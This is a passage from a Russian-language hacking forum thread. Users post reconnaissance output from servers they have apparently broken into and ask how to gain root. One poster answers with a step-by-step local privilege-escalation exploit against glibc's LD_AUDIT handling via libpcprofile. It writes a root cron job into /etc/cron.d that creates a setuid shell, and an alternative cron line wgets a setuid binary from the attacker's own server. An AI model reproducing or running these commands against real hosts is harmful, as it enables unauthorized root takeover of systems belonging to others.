-rw-r--r-- 1 root root 76216 2007-12-08 19:44:17.000000000 +0100 /lib/libnss_ldap-2.3.6.so

lrwxrwxrwx 1 root root 20 2007-12-08 19:44:17.000000000 +0100 /lib/libnss_ldap.so.2 -> libnss_ldap-2.3.6.so

-rw-r--r-- 1 root root 34320 2009-01-17 12:58:52.000000000 +0100 /lib/libnss_nis-2.3.6.so

lrwxrwxrwx 1 root root 19 2009-06-28 21:55:56.000000000 +0200 /lib/libnss_nis.so.2 -> libnss_nis-2.3.6.so

-rw-r--r-- 1 root root 38340 2009-01-17 12:58:52.000000000 +0100 /lib/libnss_nisplus-2.3.6.so

lrwxrwxrwx 1 root root 23 2009-06-28 21:55:56.000000000 +0200 /lib/libnss_nisplus.so.2 -> libnss_nisplus-2.3.6.so

lrwxrwxrwx 1 root root 14 2009-06-28 21:56:33.000000000 +0200 /lib/libpam.so.0 -> libpam.so.0.79

-rw-r--r-- 1 root root 29700 2009-03-18 00:58:08.000000000 +0100 /lib/libpam.so.0.79

lrwxrwxrwx 1 root root 19 2009-06-28 21:56:33.000000000 +0200 /lib/libpam_misc.so.0 -> libpam_misc.so.0.79

-rw-r--r-- 1 root root 8264 2009-03-18 00:58:08.000000000 +0100 /lib/libpam_misc.so.0.79

lrwxrwxrwx 1 root root 15 2009-06-28 21:56:33.000000000 +0200 /lib/libpamc.so.0 -> libpamc.so.0.79

-rw-r--r-- 1 root root 9660 2009-03-18 00:58:08.000000000 +0100 /lib/libpamc.so.0.79

-rw-r--r-- 1 root root 5400 2009-01-17 12:58:52.000000000 +0100 /lib/libpcprofile.so

lrwxrwxrwx 1 root root 16 2006-08-08 02:47:49.000000000 +0200 /lib/libpopt.so.0 -> libpopt.so.0.0.0

-rw-r--r-- 1 root root 26444 2006-08-08 02:47:49.000000000 +0200 /lib/libpopt.so.0.0.0

-rw-r--r-- 1 root root 48256 2006-09-13 03:54:01.000000000 +0200 /lib/libproc-3.2.7.so

-rw-r--r-- 1 root root 81701 2009-01-17 12:58:56.000000000 +0100 /lib/libpthread-0.10.so

lrwxrwxrwx 1 root root 18 2009-06-28 21:55:56.000000000 +0200 /lib/libpthread.so.0 -> libpthread-0.10.so

lrwxrwxrwx 1 root root 18 2006-12-19 16:51:31.000000000 +0100 /lib/libreadline.so.5 -> libreadline.so.5.2

-rw-r--r-- 1 root root 188760 2006-12-19 16:51:33.000000000 +0100 /lib/libreadline.so.5.2

-rw-r--r-- 1 root root 59172 2009-01-17 12:58:52.000000000 +0100 /lib/libresolv-2.3.6.so

lrwxrwxrwx 1 root root 18 2009-06-28 21:55:56.000000000 +0200 /lib/libresolv.so.2 -> libresolv-2.3.6.so

-rw-r--r-- 1 root root 30616 2009-01-17 12:58:52.000000000 +0100 /lib/librt-2.3.6.so

lrwxrwxrwx 1 root root 14 2009-06-28 21:55:56.000000000 +0200 /lib/librt.so.1 -> librt-2.3.6.so

-rw-r--r-- 1 root root 79368 2006-11-05 20:27:33.000000000 +0100 /lib/libselinux.so.1

-rw-r--r-- 1 root root 219824 2006-11-15 09:59:54.000000000 +0100 /lib/libsepol.so.1

lrwxrwxrwx 1 root root 22 2006-09-20 17:39:13.000000000 +0200 /lib/libslang.so.1-UTF8 -> libslang.so.1-UTF8.4.9

-rw-r--r-- 1 root root 370756 2006-09-20 17:39:13.000000000 +0200 /lib/libslang.so.1-UTF8.4.9

lrwxrwxrwx 1 root root 17 2006-10-18 21:50:17.000000000 +0200 /lib/libslang.so.2 -> libslang.so.2.0.6

-rw-r--r-- 1 root root 644012 2006-10-18 21:50:19.000000000 +0200 /lib/libslang.so.2.0.6

lrwxrwxrwx 1 root root 12 2007-12-06 20:57:44.000000000 +0100 /lib/libss.so.2 -> libss.so.2.0

-rw-r--r-- 1 root root 18520 2007-12-06 20:57:50.000000000 +0100 /lib/libss.so.2.0

lrwxrwxrwx 1 root root 17 2006-10-29 18:23:02.000000000 +0100 /lib/libsysfs.so.2 -> libsysfs.so.2.0.1

-rw-r--r-- 1 root root 37496 2006-10-29 18:23:07.000000000 +0100 /lib/libsysfs.so.2.0.1

-rw-r--r-- 1 root root 17860 2009-01-17 12:58:52.000000000 +0100 /lib/libthread_db-1.0.so

lrwxrwxrwx 1 root root 19 2009-06-28 21:55:56.000000000 +0200 /lib/libthread_db.so.1 -> libthread_db-1.0.so

lrwxrwxrwx 1 root root 19 2007-02-13 02:05:37.000000000 +0100 /lib/libusb-0.1.so.4 -> libusb-0.1.so.4.4.4

-rw-r--r-- 1 root root 28740 2007-02-13 02:05:37.000000000 +0100 /lib/libusb-0.1.so.4.4.4

-rw-r--r-- 1 root root 9656 2009-01-17 12:58:52.000000000 +0100 /lib/libutil-2.3.6.so

lrwxrwxrwx 1 root root 16 2009-06-28 21:55:56.000000000 +0200 /lib/libutil.so.1 -> libutil-2.3.6.so

lrwxrwxrwx 1 root root 14 2007-12-06 20:57:44.000000000 +0100 /lib/libuuid.so.1 -> libuuid.so.1.2

-rw-r--r-- 1 root root 9128 2007-12-06 20:57:50.000000000 +0100 /lib/libuuid.so.1.2

lrwxrwxrwx 1 root root 16 2007-02-25 21:06:02.000000000 +0100 /lib/libwrap.so.0 -> libwrap.so.0.7.6

-rw-r--r-- 1 root root 27596 2007-02-25 21:06:02.000000000 +0100 /lib/libwrap.so.0.7.6

sh-3.1$ mount

/dev/vzfs on / type reiserfs (rw,usrquota,grpquota)

proc on /proc type proc (rw)

sysfs on /sys type sysfs (rw)

tmpfs on /lib/init/rw type tmpfs (rw,nosuid)

tmpfs on /dev/shm type tmpfs (rw,nosuid,nodev)

devpts on /dev/pts type devpts (rw,nosuid,noexec)

tmpfs on /opt/psa/handlers/before-local type tmpfs (rw)

tmpfs on /opt/psa/handlers/before-queue type tmpfs (rw)

tmpfs on /opt/psa/handlers/before-remote type tmpfs (rw)

tmpfs on /opt/psa/handlers/info type tmpfs (rw)

tmpfs on /opt/psa/handlers/spool type tmpfs (rw,mode=0770,uid=2021,gid=31)

sh-3.1$ df -h

Filesystem Size Used Avail Use% Mounted on

/dev/vzfs 6.0G 3.0G 3.1G 49% /

tmpfs 12G 0 12G 0% /lib/init/rw

tmpfs 12G 0 12G 0% /dev/shm

tmpfs 12G 0 12G 0% /opt/psa/handlers/before-local

tmpfs 12G 0 12G 0% /opt/psa/handlers/before-queue

tmpfs 12G 0 12G 0% /opt/psa/handlers/before-remote

tmpfs 12G 0 12G 0% /opt/psa/handlers/info

tmpfs 12G 0 12G 0% /opt/psa/handlers/spool

sh-3.1$ cat /etc/issue

Debian GNU/Linux 4.0 \n \l

sh-3.1$ cat /etc/crontab

# /etc/crontab: system-wide crontab

# Unlike any other crontab you don't have to run the `crontab'

# command to install the new version when you edit this file

# and files in /etc/cron.d. These files also have username fields,

# that none of the other crontabs do.

SHELL=/bin/sh

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user command

25 * * * * root cd / && run-parts --report /etc/cron.hourly

50 5 * * * root cd / && run-parts --report /etc/cron.daily

13 5 * * 7 root cd / && run-parts --report /etc/cron.weekly

38 3 5 * * root cd / && run-parts --report /etc/cron.monthly

#

sh-3.1$ cat /proc/version

Linux version 2.6.18-028stab070.10 (root@rhel5-build-x64) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-46)) #1 SMP Thu Oct 21 13:44:25 MSD 2010

sh-3.1$ cat /proc/sys/vm/mmap_min_addr

cat: /proc/sys/vm/mmap_min_addr: Operation not permitted

sh-3.1$ ls -la /usr/bin/staprun

ls: /usr/bin/staprun: No such file or directory

Можно чем поковырять ? К glibc не уязвима, gcc нету

#207

11.01.2012, 16:20

Gonsalez

Guest

Сообщений: n/a

Провел на форуме:
0

Репутация: 0

Цитата:

Сообщение от None

$ uname -a
FreeBSD vint.tryte.kiev.ua 8.1-RELEASE FreeBSD 8.1-RELEASE #0: Fri Oct 8 13:30:26 EEST 2010 root@vint.tryte.kiev.ua:/usr/obj/usr/src/sys/ISP-NEW amd64

Цитата:

Сообщение от None

$ ls -la /boot
total 2484
drwxr-xr-x 7 root wheel 1024 Oct 8 2010 .
drwxr-xr-x 20 root wheel 512 Sep 6 23:16 ..
-r--r--r-- 1 root wheel 7647 Oct 8 2010 beastie.4th
-r--r--r-- 1 root wheel 8192 Oct 8 2010 boot
-r--r--r-- 1 root wheel 512 Oct 8 2010 boot0
-r--r--r-- 1 root wheel 512 Oct 8 2010 boot0sio
-r--r--r-- 1 root wheel 512 Oct 8 2010 boot1
-r--r--r-- 1 root wheel 7680 Oct 8 2010 boot2
-r--r--r-- 1 root wheel 1201 Oct 8 2010 cdboot
drwxr-xr-x 2 root wheel 512 Oct 8 2010 defaults
-r--r--r-- 1 root wheel 808 Feb 24 2008 device.hints
drwxr-xr-x 2 root wheel 512 Feb 24 2008 firmware
-r--r--r-- 1 root wheel 2262 Oct 8 2010 frames.4th
-r--r--r-- 1 root wheel 7535 Oct 8 2010 gptboot
-r--r--r-- 1 root wheel 26895 Oct 8 2010 gptzfsboot
drwxr-xr-x 2 root wheel 29184 Oct 8 2010 kernel
-r-xr-xr-x 1 root wheel 233472 Oct 8 2010 loader
-r--r--r-- 1 root wheel 5865 Oct 8 2010 loader.4th
-rw-r--r-- 1 root wheel 18 Jun 9 2010 loader.conf
-r--r--r-- 1 root wheel 15219 Oct 8 2010 loader.help
-r-xr-xr-x 1 root wheel 229376 Feb 24 2008 loader.old
-r--r--r-- 1 root wheel 385 Feb 24 2008 loader.rc
-r--r--r-- 1 root wheel 512 Oct 8 2010 mbr
drwxr-xr-x 2 root wheel 512 Feb 24 2008 modules
-r--r--r-- 1 root wheel 512 Oct 8 2010 pmbr
-r--r--r-- 1 root wheel 235520 Oct 8 2010 pxeboot
-r--r--r-- 1 root wheel 703 Oct 8 2010 screen.4th
-r--r--r-- 1 root wheel 35136 Oct 8 2010 support.4th
drwxr-xr-x 2 root wheel 512 Feb 24 2008 zfs
-r--r--r-- 1 root wheel 33280 Oct 8 2010 zfsboot
-r-xr-xr-x 1 root wheel 253952 Oct 8 2010 zfsloader

Цитата:

Сообщение от None

$ mount
/dev/twed0s1a on / (ufs, local)
devfs on /dev (devfs, local, multilabel)
/dev/twed0s1e on /tmp (ufs, local, soft-updates)
/dev/twed0s1f on /usr (ufs, local, with quotas, soft-updates)
/dev/twed0s1d on /var (ufs, local, soft-updates)

Цитата:

Сообщение от None

$ df -h
Filesystem Size Used Avail Capacity Mounted on
/dev/twed0s1a 496M 473M -17M 104% /
devfs 1.0K 1.0K 0B 100% /dev
/dev/twed0s1e 496M 21M 435M 5% /tmp
/dev/twed0s1f 423G 203G 186G 52% /usr
/dev/twed0s1d 19G 9.1G 8.8G 51% /var

Цитата:

Сообщение от None

$ cat /etc/crontab
# /etc/crontab - root's crontab for FreeBSD
#
# $FreeBSD: src/etc/crontab,v 1.32 2002/11/22 16:13:39 tom Exp $
#
SHELL=/bin/sh
PATH=/etc:/bin:/sbin:/usr/bin:/usr/sbin
HOME=/var/log
#
#minute hour mday month wday who command
#
*/5 * * * * root /usr/libexec/atrun
#
# Save some entropy so that /dev/random can re-seed on boot.
*/11 * * * * operator /usr/libexec/save-entropy
#
# Rotate log files every hour, if necessary.
0 * * * * root newsyslog
#
# Perform daily/weekly/monthly maintenance.
1 3 * * * root periodic daily
15 4 * * 6 root periodic weekly
30 5 1 * * root periodic monthly
#
# Adjust the time zone if the CMOS clock keeps local time, as opposed to
# UTC time. See adjkerntz(8) for details.
1,31 0-5 * * * root adjkerntz -a
#*/1 * * * * root pkill -u nearbirds.com
#*/1 * * * * root pkill -u kriza.com.ua
#*/1 * * * * root pkill -u novosti7.com

Цитата:

Сообщение от None

$ pwd
/usr/home/multisport/data/tmp

Выложил не все команды, т.к. остальные не выполняются..

Пробовал пробивать FreeBSD 8.*, 7.* Local ‘root’ Exploit, права остаются без изменения..

#208

11.01.2012, 16:28

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

Цитата:

Сообщение от None

Можно чем поковырять ? К glibc не уязвима, gcc нету

С чего это вдруг?

Код:

Code:
-rwxr-xr-x 1 root root 1147548 2009-01-17 12:58:52.000000000 +0100 /lib/libc-2.3.6.so
-rw-r--r-- 1 root root 13644 2009-01-17 12:58:52.000000000 +0100 /lib/libmemusage.so
-rw-r--r-- 1 root root 5400 2009-01-17 12:58:52.000000000 +0100 /lib/libpcprofile.so

#209

11.01.2012, 16:32

Unknown

Guest

Сообщений: n/a

Провел на форуме:
23035

Репутация: 5

Скрипты выдают нечто вроде "System seems to be not Vulnerable", руками тоже не получается (компилил suid'ник на другой машине)

#210

11.01.2012, 16:52

Expl0ited

Guest

Сообщений: n/a

Провел на форуме:
262707

Репутация: 935

Что вы там компилите? Я не понимаю. Пошаговое руководство:

Убираем маску прав доступа для создаваемых файлов (при umask 0 файлы будут создаваться по умолчанию с правами "-rw-rw-rw-")

umask 0

Для атаки будем использовать стандартную библиотеку профилирования libpcprofile, входящую в комплект libc:

dpkg -S /lib/libpcprofile.so

libc6: /lib/libpcprofile.so
ls -l /lib/libpcprofile.so

-rw-r--r-- 1 root root 5496 2010-10-12 03:32 /lib/libpcprofile.so

Код инициализации libpcprofile не проверяет различия эффективного и текущего идентификатора пользователя, но при этом позволяет создать лог-файл, который можно создать в любой системной директории:

LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping

ERROR: ld.so: object 'libpcprofile.so' cannot be loaded as audit interface: undefined symbol: la_version; ignored.

Несмотря на вывод ошибки, процедура инициализации выполнилась и в директории /etc/cron.d был создан лог-файл:

ls -l /etc/cron.d/exploit

-rw-rw-rw- 1 root taviso 65 2010-10-21 14:22 /etc/cron.d/exploit

Как видно, права доступа на созданный файл, позволяют любому пользователю записать в него любые данные, которые затем будут выполнены системой cron от пользователя root. Например:

printf "* * * * * root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit\n" > /etc/cron.d/exploit

Через пару минут наблюдаем:

ls -l /tmp/exploit

ls: cannot access /tmp/exploit: No such file or directory

...
ls -l /tmp/exploit

-rwsr-xr-x 1 root root 83888 2010-10-21 14:25 /tmp/exploit
/tmp/exploit
whoami

root

Так же можно, просто скомпилировать суидник на своей системе, и заказчать на атакуемый сервер, дадим ему имя например suid и поместим в директорию /tmp, и уже от рута, дадим ему необходимые для дальнейшей работы права от рута

Код:

Code:
printf "* * * * * root wget http://твой_сервер/suid -O /tmp/suid;chown root:root /tmp/suid;chmod 4755 /tmp/suid\n" > /etc/cron.d/exploit

И ничего компилировать не нужно! Я не знаю какими скриптами вы пользуетесь, но лучше всего сначала воспользоваться головой.

Страница 21 из 74

« Первая

Последняя »

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход